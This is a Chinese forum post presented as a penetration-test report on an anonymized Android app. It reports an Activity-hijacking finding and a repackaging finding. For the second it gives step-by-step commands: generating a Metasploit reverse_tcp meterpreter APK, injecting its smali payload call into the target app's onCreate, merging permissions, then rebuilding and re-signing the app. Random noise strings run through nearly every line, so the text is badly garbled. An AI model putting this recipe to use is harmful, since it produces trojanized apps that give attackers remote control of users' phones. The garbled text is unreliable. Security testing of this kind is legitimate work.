原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

7 U& g' y- @3 E% j% m2 q1 L3 p9 n4 d5 R; E% ? ]4 u* U
: V; b& y. R* C B6 W* \5 x, r2 `$ A% d

- e- K* N( d' \. ~7 f. b 6 t3 A/ F% X6 R6 X2 x2 M! P$ w 文档编号： , K7 w! f( J1 e Y' v/ d+ M- M; n* ? q9 d2 X/ @& P

- h/ x6 ^7 c' m 9 n1 H; ]. B+ n; \7 p }1 p ( U# L' Z2 i. C' N, [ o3 G8 X4 L$ @, n$ \7 O0 F' j6 ?

& b4 ~" H, U" |/ Z3 ~1 U$ E {4 p7 H0 |! u$ L5 i+ ` 9 k0 ?5 B! w3 U4 Q . S5 q6 D {0 K

$ b& [2 j* {' l; O1 K * T7 Y/ [/ t3 T: v! |' { 7 w6 V3 ], l) A8 l + \0 E _! o1 d, x

J/ P' y/ y6 d5 ^( _: \$ r' d, F $ j& g' n6 ^% Q1 V$ i- T' {: O8 v! Q & ~* m3 Y6 Z6 s! [3 g , {+ l+ X4 P- q

2 n" a% g4 e$ B3 c% C; v" |# I' h; P- l9 I 3 n( {; x/ ^8 V' N0 N % C* W) ]1 T1 G* R' w8 c0 J

; v$ u+ P/ z8 Z6 _2 P J% E$ B* [7 Y! x6 ~' h$ [5 X 某某某APP渗透测试 ( w( x; g2 o. y3 L. Z# u ( N2 N7 E; e; o" A& t& O

, ?0 K0 g Z# R* a ' r; H# G" C! J+ B - [& Q' D- ?5 h9 i+ C: a" o & ~ D! d* L5 k( S

" |* W: ]. b+ z" }& Z. L ! a6 ^& C* \; s- V* \% k 9 i y4 `8 W% [. k! t ; m+ s8 }0 l5 j& E/ Y; M

) [; b$ |% z V+ h- { ; A# G& L. [$ @/ q& Q5 E# U # _( B$ \5 @" W% @+ | * G ?& o$ G9 c7 v% g$ j: a* D" d+ r/ N

% ]* L7 r- `0 w% A8 f / A0 F" q% o- B; w 1 \% O o2 m8 u8 l9 s2 v6 [" d 0 f8 c( D: L" T2 K) a! G

3 w: w, S2 q8 _/ I! {# u 9 @0 e5 o3 o/ _" t& x+ c" K 技术报告 % z4 Y: t" @9 f. M$ ]+ G) \- L @( ~2 k. Z- z

4 Z* C" h _0 G+ v9 x, _. L6 o- m/ |7 X) C0 ]" O . a1 |/ I- d; P ) _- Q4 e' w3 p2 F0 o

( @! t4 N6 S6 S7 S1 ? , P! j6 V ?0 e d/ ]' Y 6 J* b7 _5 @6 j2 y+ F% s, Z% E1 T' s$ ]8 H( g: q9 ~/ j

* G8 c- t/ z2 A7 F" w$ a 5 Q2 P% o2 m# O- ?9 }* w% C . {4 _. M7 k: n- R, o9 w& ^3 B8 w$ l0 }8 a

. M/ }6 O# r$ r3 J" K ; j& A# O2 L8 _6 v8 A, Q 1 o4 T; ?3 A+ o9 O- M3 h, t. q 0 ^2 q; a5 ]3 u) C, X- k, C

5 |5 {1 C3 q2 ]+ U/ A T 4 B4 H7 i7 ~% @4 X0 w & [, e0 u' k5 G# f" H5 o * Y! D; t5 {; [8 S0 c5 N' q2 u% ~

% \* d* O3 D! @ $ h3 W, A1 @: {: z/ z1 H 2 K) L9 ~) M* D. r, U3 a2 k 9 P6 Z, m9 G! d* m |+ _/ S, W+ E& }0 E

" b R) s) i4 V 6 o( Q4 u. I2 C % o2 X& `$ |7 u# E 0 S- C( F: n( N; T

' M {; d* Y- Y7 I. m7 z- n. x4 \- Y; } 3 |! p3 L1 S3 S6 O# g; x6 i % B# v2 p) ^" Z4 U+ R! {# R/ V* z

4 C7 C' Q U# [* Q- @. B * g- |+ I: _: t% R' v4 N# P 0 q2 c0 P& w: k. h; N6 u . e: Y5 s, n8 k

2 m0 X+ L0 Q0 R" T1 u% A ) r, }7 B5 ~8 ?9 }7 u 1 n! ]7 @" L3 Y- Y7 Q4 z; ]) z& s- m

6 Y' h5 ] f1 b& v) ~' q$ ^/ f $ a3 U' i* Z' |+ D/ a+ R ( R8 V7 M) P' a: P' l ( D1 `0 v2 [0 M0 n+ n' ? O

9 M, a& Z% n5 Y1 P$ D2 I 4 c+ ^# g& x3 {, W. J$ }( d7 U 3 j( E5 B% _ w7 @+ A u5 W" r 2 @4 l8 R+ ^# @; V

/ c: F, g8 g7 ^4 R. G+ O8 N" g3 n; J* ^ 5 i0 N' u* h( I6 Y. q4 ]2 q2 r" }( v* w* O$ i: _" B# a

( v D7 x2 ?1 \: H& x- n; b4 B7 z- k, Y* x( _ 8 O" E+ }! c5 {& k Q* h, G. H+ b 2 ~# S+ N/ k- x& N* N

4 q6 F) N+ \7 v- s0 A A$ J& U @3 k7 {" [: f: s . E4 F% t8 g6 [& J ~ 1 ~! u6 E1 B( P3 r B, i

/ l8 Z* r; f/ X8 k* c. q / a3 h; q( N. |4 s 5 ~% L# [0 W# X: _1 w' h. c# X: u: X - d6 R4 S; @( H9 U* [& }- w0 W

4 X$ d4 Z& [8 O: B! d / h' a z8 o6 S; F % b( u" C9 i- I5 v ( Y+ G( d4 i& }8 ^. X4 c

! D/ {2 I3 U' L' p- R: y! F/ ^/ T2 C 8 y* ?' j- u" I8 C$ } ! H. w6 S ]* e$ M. A, s2 H3 @5 |* ^! w' e

0 ?" ~ H9 ~4 c& ^ y$ S9 a# \. k& i. P' e9 @ 二〇二〇年 ' H/ q! I- h* p8 u: R8 @1 o* K8 M4 H U7 [; D

4 z% U& E$ z* N4 `' q6 \' m4 h; v W) _* P 目录 1 d* Y; k6 C! O7 `6 t' G/ C2 u 7 H+ X' D) h( u- K% a7 {

# l3 ~/ h- }3 h1 b" q 4 ]6 D8 C' A: A& F* O % ?( [: P& F6 Z9 @! \ 6 [$ B& v' U2 k" d1 J, N

! {. Y) c+ D3 T6 x2 S 5 ?- D; q( q, n 1 概述... 3 3 R% K8 X$ X/ G' I+ j ) \4 L. ]2 l9 m: _" K

( c( i5 j( {- ~+ Z3 P8 w3 g u0 a 6 H9 Z( e; O6 V 1.2测试时间... 3 , D# G* S) ?* O, M9 _, E- E/ w% K" ~& p5 h+ Y) n

0 f; G' l! Q+ i+ j m k# i # h/ G& D3 {; v+ i 1.3测试对象... 3 6 d! e2 ^2 ?) l" J/ B7 l/ r0 E1 A+ R1 Y2 D: i' a; |

6 @* T: N" h$ r1 L9 d a; f( L, j: u6 a# K) K 1.4测试结果... 3 7 q0 I- Y- r6 E7 a) d + v2 m* Q3 R0 K, Z1 t8 P

! ~# e2 N- \8 P- _4 h5 n 9 z! L4 M! [; Y# v: Y6 y+ W; o7 z 2 检测结果... 4 # L( H8 `* D- S6 a n/ ?* n" X# c- u/ [ Z4 Z

& d7 u8 R! i8 F. W3 r- l 2.1 某某某... 4 Y$ U- G _: x! h8 H% ` . {) \+ j! _! r5 ]

7 L$ W6 ~ I7 v! o3 q7 X " D, f7 u2 W/ N2 B+ b3 I' I- b 2.1.1检测目标... 4 O7 ~+ ~; n, `) A% c: A 7 y; ?1 V6 S$ L: F& q3 _: a ~1 Q

; s9 J, c$ q7 U- g+ I1 V / M. x: G5 ~# P9 J, ~ 2.1.2检测结果... 4 - ~- e. r# x1 {2 @3 G% h: Q* m' m0 P. ~5 [ c5 p+ p: H. x! r) K) P2 ~

) j" k# [3 | }2 p. D$ J 4 S/ l6 O* \7 { 2.1.2.1. 4 " s0 a8 s L1 E* u* ]: ]" L8 o0 M3 P+ B6 m! T

: _& ~9 m; u) P" R1 _ ! c M( a; M& W: s4 G8 n 2.1.2.2. 6 - z5 z+ \/ O7 f+ m4 e; Y5 j G- |: `9 u) H" L3 w- M

7 V$ n" w+ ?1 P% R8 L5 ~ ( \ s& R. j! }1 z+ G9 z" Q * z: k" \: y. c9 a( _* M ! y$ b8 E6 ]" k4 q8 T0 A

! G! A" V9 I$ _# s4 p, ` 4 j4 R9 D$ \! C 1 概述 . ]6 f6 o* l: q v( s 1 p: f2 `" k/ C' a/ ]* g4 k

# r3 i9 E0 y4 U0 \3 [ 3 y) k7 G6 D ?" ?1 [9 ^( r6 ]2 q/ l 1.2测试时间 , b& W4 ^8 d) E! g, o 9 R/ G1 c8 h% C/ X, \' K1 G" F

" r* E. P) o9 _. p! r o ( }' k3 D* a5 ?" v' v - A8 L4 ~5 E! I' V2 {) B7 p5 V 2 {: v8 d& y8 J: \|, {' G0 b, e2 ` 渗透测试时间 7 z$ @- \|2 S& U. [4 y, C" e " N: X; m% ?& u. G1 e # C* H) d; p4 G+ J/ K5 N# G ' R1 p k6 O1 g4 U& `. J
3 b7 M! S9 D5 }2 U; r( ^ + x g+ m- G( z: K + s f9 d1 K; h& d R) ^# E8 l4 ` m. \|0 j 起始时间 ' l& b, `9 F1 H+ X6 t! i * ~6 Q+ z" U. j 2 l/ @5 F, L- P9 n( m( w2 _ 0 h8 v9 x/ b" L) u( U3 T" z/ p	. \|: x' x- W- l$ _ F" G 4 o6 [$ W8 ]. S; g7 k+ I : A$ P) N! K: N8 g* d 9 C( k* d t( m 2020年4月6日 2 \|% k: q2 S$ N7 M" g 2 o" N' R# Q( C. y; v( p 3 a) f4 M/ {- S' s$ E1 s " ]9 I! v5 g( t1 k/ D x8 }9 M0 s/ H
3 _ S, c- k; R 2 ?0 P7 W- ?: K0 V6 S* w7 k* Y 4 c0 w4 ?* l" W9 j( a( k8 \|" m1 n$ j1 I# ~8 A 结束时间 & S' u* u2 g3 L, D 3 B" M. ?7 \. R, Z- z1 ` $ E' V# ]( q/ H7 h$ x8 Y2 W& T # q S0 X/ s3 o# G( L	% D& x6 i& W% _0 Z 6 l% d, p, k* `: \8 c : e- t9 ]0 _2 _! B9 p4 Q, G ( `8 g+ [4 C/ f) B! ~% N4 T 2020年4月9日 % B0 u! C; ~/ r1 k9 f' O: B# A. U/ o+ g6 } % {$ z& A& f J D. h; B' J6 K% A0 f( G% _( t

, ^+ U1 K: L' a7 N( O) {1 Z3 h) w4 n2 T5 T' T, ?2 O 1.3测试对象 . Q0 \# m/ b3 D/ L; o- d1 l$ N+ Y% q8 V5 g; }

( k4 f) V: ]6 w7 R # V' L# A R$ O0 N( t, M& [9 f: p! L 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： $ w! F2 y9 _9 k" ]& I; D* S % l; s) Q! A* Y9 I4 T1 J

! |' J! z! ~1 s& | $ v4 u) i* x- ^ 表1-1 检测对象 & u0 L2 _0 X2 p0 ]0 k7 S 5 ` S9 G) o. h1 Z/ ~2 y% ?

, ^6 k* x5 Q; h# m" G- W3 G8 @7 p; C, ?2 G y " u/ n- B. Q2 J& S% g$ g7 k - M M; b; m7 t+ I+ j2 E 序号 ( F4 ]: n" u6 @# ]( M* L* c& f2 L % a v0 j& u+ w & Y. T" V# M% A, ~6 ` ' S* `) z1 m6 g; C) S	$ c; R2 h; T: ]9 k3 j" U) y% V, M1 E! \|9 ] ( A" v8 W1 V# Y( W$ ^! D, ` 4 L( [, \|5 a/ Y g$ ? 测试对象 ' m' H$ _5 `0 @2 s# n + ~' j x" v( T: c( d 1 J7 P f+ ]2 M1 N: { v' S+ a3 \9 n6 ~" L+ B; d1 k	" t2 z( p5 a1 f! G 3 U# ~6 d5 X% Z! C1 G4 _ 8 \|2 t' a8 E9 s5 B8 q( _' x" s : U2 r4 a! a% F% B3 k$ N 测试地址 . E- a% t4 I7 \| 1 K( m7 P; k8 ~) \|5 B+ @ 7 I3 r7 R. F2 G& f# ]2 o + C; B. Q7 K( J& i0 U	: A8 v5 s- V3 h4 Z 1 L% h4 n5 M) f2 u1 h( p2 W2 c " [& g0 J; _- \7 ?: ` ) I: D0 y6 a9 Z, D3 {1 Z 安全漏洞 7 \& \|1 q' d% O7 e a% n# e! V$ g2 Q1 q' v3 H0 Y- D" v , V8 A; Q$ F8 V- V+ G 7 _/ O. p: X% o2 C' D6 v8 q
- v* J3 K' r, V- h$ C . @' e2 c) g+ P& k& G # j# f I2 b$ ]3 ` . Y5 T4 B& p* K! n' S f 1 ( P" o' a e% D, ^8 k9 S4 H / V8 F6 V3 L8 s* ] 2 q/ n; _- S6 X7 q # C, j: w N7 e: E i6 s: O& B* ~	: o: a1 `# _/ d2 h/ D 3 W4 c4 W7 Y& J% ^2 [ . e6 ?; ]: M8 H! S& W, p 1 y! \|8 s3 Q9 \4 q+ f6 ` 某某某安卓APP $ N( f2 m1 o, I 7 G& P: p0 m0 S: \* o) `* Y " g2 M( [& ]$ B0 `, Y! F 1 n% f7 V9 Z( x9 E% p3 r	1 b7 r. O; s3 \/ t& e " ~! S( Y0 \|8 ^/ y1 H8 c* z - G3 _! ?# M* O) y* K0 o 5 {7 W3 Q \|; E" F; l3 i \. S5 J4 L: u* ~# `8 x7 u 8 @; x5 B$ D9 M# [0 Z% l' w/ `: A 0 J" q( f) F) J9 L2 N ( r ^0 c( L; p y# V	# a/ P. N4 e6 R8 n) Z9 G6 Y) R 9 }0 n+ x) l1 b) E0 c ; q O* i5 Q; v3 }& J% V 1 `. k& T# A& V& ]# z: H 2 & x! @/ x9 t1 l" M 5 O6 h4 V6 C/ R* V0 M& j / G* B4 d( d! v* f7 k7 g0 W: _# b3 V. d4 Y6 [% i

8 q3 _8 w9 ]1 H3 s2 k * |7 A. I2 p; h, w( J+ K 1.4测试结果 - ?% M8 \! r; G) C ) M/ v( m" l0 I- D8 W

' J# S, ]- ^! R2 b* |: l3 w, Z$ M- f' r o0 n7 ?1 }: B 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： $ g- f5 r9 Z# T1 z _9 S# ]* H ' }7 B0 B, v; {$ n; u6 l7 `

o9 W5 p" d4 b% n, s& r/ V 8 I2 H6 d( N- N( I1 M F; s5 K5 `8 K4 [- \) @1 k. g7 C) Q" Q- x

( j6 X) |: _$ ?+ R4 y+ Z# K7 c2 q 序号 ! c, L" `$ k0 b8 G! ~7 I( s, y * d; y4 @( } f2 N4 ?; x$ L& _( I

$ w7 |% \5 t& |' w. T6 o ( |3 [( W+ Z8 K' a 系统名称 6 [- X+ Q) f# b! ^ 5 x- d: D! M ]

% ~' r- k4 O) L # n! Q% S( X3 d( B$ ?# p% F$ L 漏洞名称 , G" W" D$ G) R1 A6 R, v5 a7 \3 M9 a8 d

- H% C, Q' b2 N" l% x) ?: A0 M 6 b2 Z5 H5 h* K5 [, V; \& {$ t' g 漏洞危害 M& a. ~: E1 v! e0 }- w' N @4 S. x- |8 a

2 i1 _6 x* ~; [; T6 I# k# c9 z- ~& `# h# Q4 ]2 ~ 修复结果 ) T V" q7 M% }: i; t& d " X3 k9 J+ [ z/ }" d: g2 ]

: C1 `2 D( Y( ^" e" m6 Z& g" `& w 9 n5 `+ ^3 s$ ^& t 1 1 t9 i) Q- A. S; }5 R: p % E9 L9 R: K6 H5 u# @

2 U- ~: D7 {, k; \$ [- M 5 c5 C" \0 w/ E# U! Z2 b. Y 某某某某某某APP $ \- S7 }4 c, y3 n7 {7 D; y1 d q1 b/ v6 @" n% ?: i6 E0 x

' @" {( _7 A7 D6 z O1 @ ' f* v% C( Q7 _; | Activity 劫持 * ]" n; I3 s! W' x$ F, J+ x* d8 \/ B * b; e: C1 A4 _: M6 M2 D; n$ n

3 u) z- N/ M1 a2 W) e$ M& P D A " M \' w/ R; I5 r 4 w1 [# T6 Q: U# Z7 \7 h6 q

0 p9 T& [) q3 H2 `0 C " N7 z; Q% Q5 _* b9 a& D 高 , {: ^1 s( R- y5 \5 N" g3 F' F

) A( g* I4 h' S - L: b8 }& @- m6 U3 @ 7 i0 F! e4 V( `% j* u1 r $ T9 a6 y4 q) O( B6 p$ V( ?

6 i4 p+ S, N% a , L7 E4 j6 I% g& t5 i" ^ 2 & k) \/ }; M' M & \, Q7 B5 P3 @/ }& b- k

2 |5 ?; S, x+ v, R, f 0 b, I, B4 ?. E5 p' z 某某某某某某APP 9 _0 J1 z1 X, u ; G# Z9 P# c6 k" [' t

( w* } n3 Y o O! m+ U ' W9 a% C6 _# {, \, K 反编译二次打包捆绑木马、篡改APP代码 4 ^+ S; w9 A2 b1 b* @0 r$ ` 3 E, o: \5 z z' _0 N+ G* [

; \+ |% c" ]+ T% `% A& y) c! E3 y " T8 X! o; I) } 高 ) m) W; t/ u# l9 X0 C( |# G: V; M7 ^/ H) h, ]

+ q3 I2 {; ~! [, f5 ^ ; G4 r* ~, Z- @2 Z + Q2 S- [- C7 c8 P" v 1 }$ q/ G% ^3 Z0 `% G+ x: N

0 B0 C0 K' A/ S$ e , a$ M$ M! A' r* ~/ D " m: A6 h0 i' y5 E& V7 K8 v9 s1 b) F7 ^+ x: q/ I% c

# N. ]9 {8 E! q! O. B4 o- D8 } ' \: O+ C) D; q; v% t& K$ i+ Q7 P% k5 s, H 表1-2 测试结果 ) C: @8 b+ q) r. q, N C$ I# L' O. r7 q

2 b% {& e) f4 T6 Y f2 s* n, f 6 O h: ]# C" P6 a ! k( h( u# ]% |1 v- e5 \- I) V) c8 g& N2 j2 b" t

) i |. T# g# ~" z! I# G ) m$ g2 G8 v/ `/ C M; c2 h 2 检测结果 6 u6 H. s' u$ t% O% J2 m9 ]) ? p' n. S+ Y) S

9 e( p4 r8 ^$ T. D' s3 K& h/ ]/ I5 J9 e 2.1 某某某 8 W/ ?7 ^9 |- t- d- r 2 f, h6 T5 Y* h9 u- W3 z) {& I* x

8 }' e, \4 f$ }3 R0 f4 @' K " \ a4 Y" v2 j0 y1 x" n1 x8 P 2.1.1检测目标 , B6 O' p: |% K3 h* I( N' x: W 1 O4 v9 H Y8 c2 v; ?7 E) ^

" H* c8 _) }" s. a3 B9 P+ o. F! O6 `4 ~$ I. A5 h. |. r( R 目标地址： 某某某某某某APP * C/ C0 M L0 S- b! q. O2 _ 4 ?3 e2 e% U0 G+ n% O, K4 T! g

- `9 x& I9 z/ l& o" @ ) q5 T9 u/ k2 u 2.1.2检测结果 . m. e5 A( ?& C 6 j: p! x3 e, _) R p" t

( ^9 |2 ], U" Z( }+ s 7 X) O" d2 [4 b2 K3 { K* c 2.1.2.1 : G9 |* F2 i! p6 n" P& h 3 S( o' M7 N) ?' f

* i2 j* }& U3 D. M" k+ p 6 ?+ \/ T) }0 J 漏洞链接地址：某某某某某某APP 1 a" K, ]0 E/ l * V v. d; C& }) S- R# @# v

. s! C. M$ t; s, p6 N3 z* I, J0 {- C. w$ _ 4 t! {( Y& c4 H; N& k7 G# k" s" o4 Z8 |

$ l$ n S; y9 N! Y' |3 I! N% @8 f & t& _& p- v% g 漏洞分析及取证： - }9 N& ?. `5 A- {- q( m! e% l; v/ V9 Z7 a

4 R; h( B( K9 I, { / X# z/ y& g! p- W# l 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： ' F' m0 b3 w8 H2 z4 x& b' T% l" ], q+ A9 `

6 e7 f3 `3 @2 p {! I $ _& r+ n/ A% I! O $ Q, A- P; T& t4 m8 T) g6 g4 {2 P, c& |! J1 O. i% G

: [, `- n9 N, [9 Q& d9 c1 \7 C% g5 J / m& Z$ x( r( Q$ v6 v % L1 o6 p) t# l5 w- o$ x 4 @- {; g8 Y* M/ b3 ?5 p' a

' h& M) s# B* ^0 H * D+ s' k9 y; S- M! e% A2 l & G* E* h" V" }( `. G/ P ( p6 j2 g9 |0 o6 y$ H7 c

$ P7 o/ T V! ]. S `3 @( V, ^1 v" E H, W4 V8 X4 m9 x# K- x8 Y z3 L! T" f. u4 l4 D / Z# F+ _9 j4 B" W

, l! D: h- m. q1 }* ^/ V1 g+ m; O( m4 P* O; F- z6 z, b3 z / N( i( M S8 v9 e# e. b % ?! B/ R$ k+ D8 I

- _" O, F( }- e7 A3 X/ \1 m 2 I5 {- z# @( G V$ ]4 H4 k 漏洞危害：高 - u9 E% |$ w! f u3 q. v$ c $ M/ N" L' j4 B2 d: b* @2 k9 m

( Y1 Z. J5 ]; ~ @ ' U. E1 E5 A# n - s( a+ a# W( a/ f) I, y% Q! z 7 q8 q Y' Z6 k+ L* D. M. { 严重程度 6 z) z/ B7 L4 { A 3 g0 c3 d5 n' R : w+ H7 c2 q. r: P9 `1 l5 U d! w8 j! \|1 S b6 u	& V: i1 Q" e+ m1 N , Y \3 H+ U; O& U ! T f- x. i b I7 D Q % e' N7 g( \8 Y, d' \# d 高 ! E3 H( C8 j! ` $ O$ B( w$ l4 f6 `( [! r: { 6 [0 Q! t& r3 J6 d3 b' `9 E$ `5 \3 v. m Z3 U. Q- X	2 @0 ? o6 N. }% B8 w ' c, i8 Q. S' m5 S6 A ( i3 p% }4 {. A' L 8 J6 p" i6 a1 m5 e' ^ ■ ! u6 G* r% V5 l , J# \8 c2 x+ \|! { * L. X& E9 j5 K4 p5 f 7 [, C0 }4 e' V0 v$ p }+ f	8 p. t0 m L: P( M/ a # o" m& ` ~7 u* i 5 e7 p7 ?5 f; _2 e ! e; u; z' ]8 \ M! o 中 # ]: l" u8 S, l! @+ R9 H3 [* V1 F5 ?; y. A% N - I1 Y6 S+ o' \9 J& e% [0 p7 P& G, N; \|' P; ~+ O	6 M, F' ]" `* T! S i$ V 1 B$ j( W& {$ j+ e' N% y+ T. p5 I" m 6 n" l/ U ?) G1 e- e: h " }3 Q# Q& x0 P6 g 9 k# `$ g0 a+ j5 H$ B ' w& ]$ k* h7 o1 p) {; Z! j " E0 v) G- \6 R7 B. x* ] ~8 G* W& G	3 G" P" Q- _' u# G5 X4 p H 9 \- n) F7 o _4 z% {. N/ Z2 G 5 j/ e8 `9 j0 l' M5 M( u' x5 ? - ]- }/ v" Q% d. y 低 ; x! l1 i1 U' X5 ^( b0 g2 t& O p/ }/ m% M; K9 J' K8 ?; x& k 2 H! y& ?. w' J( ?' r9 T- h6 l* t- {& }1 f. d! ~6 G- v" g+ Z3 r	3 a6 B7 V2 x) J- G" g+ U 2 N d3 j2 E f$ Z3 G+ d& b+ r 2 H5 H7 G. R+ u% Y1 L % y3 k* y9 u, D j 3 u7 A9 @! \$ A2 S/ O+ D' M; w4 n; i1 G4 e1 T & x- r1 `9 \|, M' Y, P* r. `/ s0 D3 ^' _. @! I

1 ^5 \* N# |) y, X9 z6 w # n ~, }" D4 D9 C6 y 1 Z8 y: y* }3 O3 a8 [ , o2 H+ t8 X8 i' Q- M7 ?- a

2 `6 C- |) n5 L2 d2 | - L' O! j- u2 [) d6 k2 a& x 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 / k/ T% F n* ]. R+ g% V: A 0 x3 d# V5 v: p9 ?

0 Y$ c" b K+ R) Q : X/ q- H) p3 W& s! E ) h4 d6 I Z! \- t: s( j9 d. D 1 X1 P6 k3 z3 o9 U

2 o: Y& }7 U' k* z& ` 8 {* c* u- U9 H* D$ O; \- N / W4 S: f" z6 p5 s( C : O U1 {( m3 T3 u/ ~

6 @' J6 S7 ?% i$ G 5 f$ k4 y' P. X- g+ u5 G 2.1.2.2 3 y1 P/ j' W1 n: G8 D $ w" B' p. H% o% u

: {+ X( z8 d. S. s' c5 C* _2 k# p. m , M* I$ H j3 C2 D8 e0 ^1 E 漏洞链接地址：某某某某某某APP $ I* v( }' H m7 m # ~+ ]( H% Q$ N! ^! p

. y* ]6 g9 v8 J ; M, E; L0 z& Y; g0 r/ f* f 漏洞分析及取证： , d: j5 H3 F s/ {$ l0 ?/ V0 Y% G- x3 e/ S

2 m9 S9 B P) r I5 y V, c+ y" _. i 6 s0 `3 W9 a/ X: {# ~# k, h 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： 4 r- W$ u0 `4 `7 M ) X% p, a1 q1 ]' C$ q

, W6 @( B/ p7 k+ Y, v. | \4 R, K' X: j$ U* U& R* _ 用Metasploit 生成木马 apk % l8 q4 c) L5 S. R2 f# C6 q. Q % L! M% |0 Q- ?/ Y9 X

0 N% X/ Q% K1 X+ {/ H/ h+ [ - q8 y3 F6 u; Y( f msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk , u4 v0 ~7 U7 f' K! M ; o% r& v5 B3 k# Y

7 u) g I# N9 S" v/ b o * e5 m6 q/ `! s3 S 反编译目标apk和木马apk ; C9 M: Q. x R- P) z 2 `2 e3 f: Y+ m8 v1 X; m: M

' g: u, L$ ]5 R5 {( o$ u ! Q ~, z# c5 B3 w2 a0 P" {7 N apktool d target.apk
9 K! h2 P# c A) |# l ! e7 v8 C3 v2 V apktool d cockhorse.apk $ w1 f3 F3 U, D) \2 r% q / L) T0 Z& H5 C/ N

7 @1 F1 }2 \5 X2 D: G( D9 D' N2 t$ _+ g 木马 apk 注入目标 apk K& b6 x7 j [- C " i* U9 z- I2 {: X" C. M i

. R8 D6 k7 m4 u! s3 H: {2 u j. i% M( u( x2 y; ^ 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
# B& L: ^7 O$ m" G+ ~, x' E: h& s, V8 F: v( B invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 2 ?% T' u4 O" _6 V! N 6 L2 z+ B& N5 L8 e. ]

* ^2 P, m! O0 u( |8 L - E" z9 R1 H' ^) {& j: R6 u" W 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 $ X3 R) r; D' q' h8 N" b 5 _6 E+ C% l q5 p" ~

7 z9 e+ ~* l+ ?$ I . ~$ f0 X, w/ [7 g5 O9 z0 D( T 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 8 o6 g& `" L3 @6 K / T* X9 z7 Z$ o: M

( Q+ G( Y( U( l; o% U1 [$ c 2 m" g, r8 a0 w0 k; m 回编译生成最终 apk 4 H1 S/ U0 `3 S 8 g, ?3 i9 y$ B# ^/ v

& f* }2 J0 V3 k# }5 d, @7 d0 R* J $ F2 B0 D* O: T3 p' }9 R6 j3 t 重新打包 # ]( B$ o! @' b ' l$ X" R+ T$ W9 d( a ]" q

( W: y+ M; y/ [: d 4 G: I+ u: }0 L1 x8 O apktool b -o repackage.apk target_app_floder 2 X& v2 A; y" M0 J& ?" r, J! e 7 ^9 D2 h8 h* t$ G B+ S

6 k) _1 S& Z' o. N9 x2 H ( X! Q k7 U5 A) y$ h0 d, c3 c) j 创建签名文件，有的话可忽略此步骤 & s. j6 }: C0 C- s/ R# i5 [, B% D, J3 N) ^- P

# S2 N& _) k/ c; ]4 B/ d & ?! b/ I: [$ E keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 - G6 f7 T2 H. C5 `$ { _( ^* n/ x2 t% |# K/ B

, r$ z+ |; i% h( g# `) T; N # F3 P8 i; t. } 签名，以下任选其一 ' ]. ?4 ~ }: _( V [/ ~& O& G0 d' {4 f* b

G3 n; q- m# S# u5 v4 @. B$ d ! j1 B9 D. O3 k4 U3 g% b jarsigner 方式 % N5 }3 N; p; i- j3 T. z 9 @5 c. K! r$ [$ t

/ _0 w5 h2 }* Q3 Y- D) _/ m5 q$ h& _8 l; c9 p1 K jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 0 X4 K6 J: o" ?0 f5 E- z* l 3 _! U% ?% l: C! U

4 y) E4 u* N q4 f0 N+ A6 p 2 d. S7 C3 F8 N2 M$ Q9 w apksigner 方式 1 m: f" ^5 M1 _: a* q0 R" g4 V7 S4 L" Q" m. |1 I

+ e9 C# s, |7 l$ E ' ~7 Y( g! ]; X$ d apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk D' ^1 r0 e! H. ?0 ] " I Q1 ], z+ R4 Y4 t0 p

7 C) I% y1 `, m3 J9 P N+ V- P5 i( Y& a6 h5 [0 q) L 如需要禁用 v2签名 添加选项--v2-signing-enabled false , ^" T1 N% \9 l$ A $ `3 ]2 M9 o6 M( a5 Q: C3 g

6 }* V3 ], V6 z9 u% k# t7 l0 h % x u: h6 ~. {! l" O6 D 验证，以下任选其一 8 c+ H' I5 d4 G( K& t! j& m5 a/ ]. c, ^! [ k" `/ ?

+ M+ I0 b+ b, Z2 b) w) W " _9 k: Q! X' A jarsigner方式 ) L: m; y" K5 l4 i% e9 a 5 I, X2 G3 a7 f" A% G

* E6 C- I2 L; i, H( S1 R; v% q1 T % C0 ^5 c8 b+ ^7 O jarsigner -verify repackaged.apk / L9 ~& c, V2 ` % W0 n/ Q( A3 T4 |, q

& B/ m- g/ k$ V( G 2 G1 m4 k* J1 {1 A apksigner 方式 * U8 N1 H$ C% W* \, M8 Q- I2 }$ o5 Y4 l0 P

! b" [( E/ D3 x; O ! m) |" q7 ?' }2 v apksigner verify -v --print-certs repackaged.apk + A2 m6 D @: R * m c7 c. |4 k0 |+ z7 t; Z# G

3 M' O( p7 X& _2 c! T 8 f& Z2 |" e3 t" ^( L' ^ keytool方式 ' C- }1 X5 Q' o& }$ f: ^& x 8 z( @0 ?2 O. F4 k# S5 T

3 d j5 S4 t, O 5 D, H$ i- B- K8 n z8 L) b( p keytool -printcert -jarfile repackaged.apk 4 e- ~7 O& @4 h2 S/ ] * y7 b! G! a- \0 T m9 `5 k9 x

; p3 _3 Z+ j$ F! P8 {' [% ~. j3 B; U1 X: i) ]/ K9 G( W 对齐 4 R: R# M8 a7 { : b! @ m O6 R6 _$ k9 ]6 {' d

